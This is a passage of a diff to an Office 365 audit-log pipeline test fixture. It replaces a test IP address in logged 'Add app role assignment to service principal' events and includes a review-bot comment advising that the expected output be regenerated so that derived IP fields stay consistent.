APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 
Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"V
alue\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -6890,9 +6890,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:26:05", "ExtendedProperties": [ { 
@@ -7126,7 +7126,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -7156,9 +7156,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T18:26:05",
 "ExtendedProperties": [
 {
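Review bot: Only the literal address is swapped in this hunk (`ActorIpAddress`, `ClientIP` under `o365audit`) and in the matching `event.original` hunk just above it, which reads as a search-and-replace over the expected-output fixture rather than a regenerated one; the same pair of edits repeats at the hunks starting `@@ -7422`, `@@ -7688` and `@@ -7954`. If this expected document also carries fields derived from that address (ECS `source.ip`/`client.ip` and any geo enrichment — presumably further down, outside the hunk), a plain substitution leaves them describing the old address and the pipeline test then asserts against an internally inconsistent fixture. Regenerating the expected file from the pipeline is the safer way to land a test-IP change; if that is what was done, a one-line note to that effect in the PR description would save reviewers checking every derived field by hand.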
@@ -7392,7 +7392,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
